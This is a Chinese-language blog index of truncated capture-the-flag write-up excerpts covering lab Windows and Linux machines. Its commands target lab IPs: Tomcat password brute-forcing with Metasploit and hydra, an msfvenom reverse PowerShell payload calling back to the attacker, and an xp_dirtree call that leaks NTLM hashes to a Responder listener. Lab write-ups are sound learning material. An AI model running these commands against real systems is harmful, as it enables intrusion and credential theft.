zhyann
Chatterbox AChat System http服务攻击
简介ChatterboxDifficulty Medium 实验环境攻击者 Kali 10.10.16.20受害者 IP 10.10.10.74 Windows 1. 信息收集9225和9226都是开启的 且是AChat System http服务 2. 漏洞挖掘与利用访问9255...
Conceal IKE服务枚举 IPSec服务连接 windows文件上传
简介ConcealDifficulty Medium 实验环境攻击者 Kali 10.10.16.20受害者 IP 10.10.10.116 Windows 1. 信息收集扫描发现没有TCP服务尝试扫描UDP服务nmap -p 1-1000 -sU 10.10.10.116先尝试扫描...
Jerry Tomcat密码爆破和.war木马利用
需要输入用户名和密码 1. 密码爆破爆破方法有两个第一个 metasploitmsfconsole use auxiliary/scanner/http/tomcat_mgr_login show options set RHOSTS 10.10.10.95 run 第二个 hydrahydra -C...
Bounty iis文件上传漏洞web.config绕过
简介SiloDifficulty Easy 实验环境攻击者 Kali 10.10.16.20受害者 IP 10.10.10.93 Windows 1. 信息收集可以看到transfer.aspx 和 uploadedfiles 上google搜索iis exploithttps://xz.aliyu...
Silo Oracle TNS Listener漏洞利用
简介SiloDifficulty Medium 实验环境攻击者 Kali 10.10.16.18受害者 IP 10.10.10.82 Windows 1. 信息收集收集受害者服务详情使用nmap脚本判断是否有漏洞nmap -Pn -sT --script=oracle-tns-po...
Grandpa WebDAV远程代码执行
http://www.zhyann.net/index.php/2024/06/03/granny-webdav%e6%96%87%e4%bb%b6%e4%b8%8a%e4%bc%a0%e6%bc%8f%e6%b4%9e-churrasco%e6%9d%83%e9%99%90%e6%8f%90%e5%8d%87/ 信息收集和权限提升和...
Arctic Juicy Potato提权
拿到了反弹shell之后这种可以用Juciy Potato或者PrintSpoofer提权kali上制作木马msfvenom -p cmd/windows/reverse_powershell LHOST=10.10.16.18 LPORT=3333 > systemreverse.batKali监听333...
Medtech 堡垒机 seimpersonateprivilege 提权
靶场信息外网三台主机地址 1. 漏洞挖掘与利用扫描VM4gobuster vm4sqlmap注入可以爆破 先尝试能不能拿到NTLMhash先监听接口responder -I tun0exec master..xp_dirtree '\\192.168.45.229\test'...
Granny WebDAV文件上传漏洞 churrasco权限提升
简介GrannyDifficulty Easy 实验环境攻击者 Kali 10.10.16.16受害者 IP 10.10.10.15 Windows 1. 信息收集收集受害者服务详情nmap -p- -T5 -n -vvv -oA Granny -noscript 10.10.10.15IIS 6.0...
ifcfg权限提升
简介现在有一个脚本是(root) NOPASSWD: /usr/local/sbin/changename.sh内容是分析脚本可以发现 这是一个可以对ifcfg-guly文件进行写入的脚本执行一下看到名为ifcfg-guly的网卡配置文件已经被修...